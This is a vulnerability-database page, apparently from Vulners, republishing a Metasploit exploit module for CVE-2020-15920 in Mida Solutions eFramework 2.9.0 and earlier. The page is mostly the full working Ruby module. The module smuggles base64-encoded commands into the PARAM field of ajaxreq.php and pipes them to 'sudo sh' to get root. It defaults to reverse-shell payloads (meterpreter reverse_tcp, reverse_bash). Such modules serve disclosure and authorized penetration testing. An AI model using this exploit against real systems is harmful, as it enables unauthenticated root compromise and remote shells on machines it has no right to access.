Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Mida Solutions eFramework ajaxreq.php Command Injection

🗓️ 16 Sep 2020 00:00:00Reported by Brendan ColesType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 636 Views

Mida Solutions eFramework ajaxreq.php Command Injection vulnerability exploi

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Mida Solutions eFramework ajaxreq.php Command Injection Exploit
16 Sep 202000:00
zdt
Circl		CVE-2020-15920
16 Sep 202015:35
circl
CNVD		Mida Solutions eFramework OS Command Injection Vulnerability (CNVD-2020-42664)
27 Jul 202000:00
cnvd
CVE		CVE-2020-15920
24 Jul 202000:58
cve
Cvelist		CVE-2020-15920
24 Jul 202000:58
cvelist
Exploit DB		Mida eFramework 2.9.0 - Remote Code Execution
27 Aug 202000:00
exploitdb
Metasploit		Mida Solutions eFramework ajaxreq.php Command Injection
16 Sep 202017:41
metasploit
Nuclei		Mida eFramework <=2.9.0 - Remote Command Execution
1 Jun 202605:38
nuclei
NVD		CVE-2020-15920
24 Jul 202001:15
nvd
Packet Storm		Mida eFramework 2.9.0 Remote Code Execution
27 Aug 202000:00
packetstorm
Rows per page
`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
prepend Msf::Exploit::Remote::AutoCheck  
include Msf::Exploit::Remote::HttpClient  
include Msf::Exploit::CmdStager  
  
def initialize(info = {})  
super(  
update_info(  
info,  
'Name' => 'Mida Solutions eFramework ajaxreq.php Command Injection',  
'Description' => %q{  
This module exploits a command injection vulnerability in Mida  
Solutions eFramework version 2.9.0 and prior.  
  
The `ajaxreq.php` file allows unauthenticated users to inject  
arbitrary commands in the `PARAM` parameter to be executed as  
the apache user. The sudo configuration permits the apache user  
to execute any command as root without providing a password,  
resulting in privileged command execution as root.  
  
This module has been successfully tested on Mida Solutions  
eFramework-C7-2.9.0 virtual appliance.  
},  
'License' => MSF_LICENSE,  
'Author' =>  
[  
'elbae', # discovery and exploit  
'bcoles', # Metasploit  
],  
'References' =>  
[  
['CVE', '2020-15920'],  
['EDB', '48768'],  
['URL', 'https://elbae.github.io/jekyll/update/2020/07/14/vulns-01.html'],  
],  
'Payload' => { 'BadChars' => "\x00" },  
'Targets' =>  
[  
[  
'Linux (x86)', {  
'Arch' => ARCH_X86,  
'Platform' => 'linux',  
'DefaultOptions' => {  
'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp'  
}  
}  
],  
[  
'Linux (x64)', {  
'Arch' => ARCH_X64,  
'Platform' => 'linux',  
'DefaultOptions' => {  
'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'  
}  
}  
],  
[  
'UNIX (cmd)', {  
'Arch' => ARCH_CMD,  
'Platform' => 'unix',  
'DefaultOptions' => {  
'PAYLOAD' => 'cmd/unix/reverse_bash'  
}  
}  
]  
],  
'Privileged' => true,  
'DisclosureDate' => '2020-07-24',  
'DefaultOptions' => {  
'RPORT' => 443,  
'SSL' => true  
},  
'DefaultTarget' => 1,  
'Notes' =>  
{  
'Stability' => [ CRASH_SAFE ],  
'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],  
'Reliability' => [ REPEATABLE_SESSION ]  
}  
)  
)  
register_options([  
OptString.new('TARGETURI', [true, 'Base path to eFramework', '/'])  
])  
end  
  
def check  
res = execute_command('id')  
  
unless res  
return CheckCode::Safe('Connection failed')  
end  
  
unless res.body.include?('uid=')  
return CheckCode::Safe('Target is not vulnerable')  
end  
  
CheckCode::Vulnerable  
end  
  
def execute_command(cmd, _opts = {})  
vars_post = {  
'DIAGNOSIS' => ['PING', 'TRACEROUTE'].sample,  
'PARAM' => ";echo #{Rex::Text.encode_base64(cmd)}|base64 -d|sudo sh"  
}  
  
res = send_request_cgi({  
'method' => 'POST',  
'uri' => normalize_uri(target_uri.path, 'PDC', 'ajaxreq.php'),  
'vars_post' => vars_post  
}, 5)  
  
if res && !res.body.blank?  
vprint_status("Command output: #{res.body.gsub(/<br>/, "\n")}")  
end  
  
res  
end  
  
def exploit  
if target.arch.first == ARCH_CMD  
execute_command(payload.encoded)  
else  
execute_cmdstager(linemax: 1_500, background: true)  
end  
end  
end  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
16 Sep 2020 00:00Current
0.4Low risk
Vulners AI Score0.4
EPSS0.93565
command injectionmida solutionsajaxreq.phpcve-2020-15920arbitrary commandsroot accessmetasploitlinuxunix
636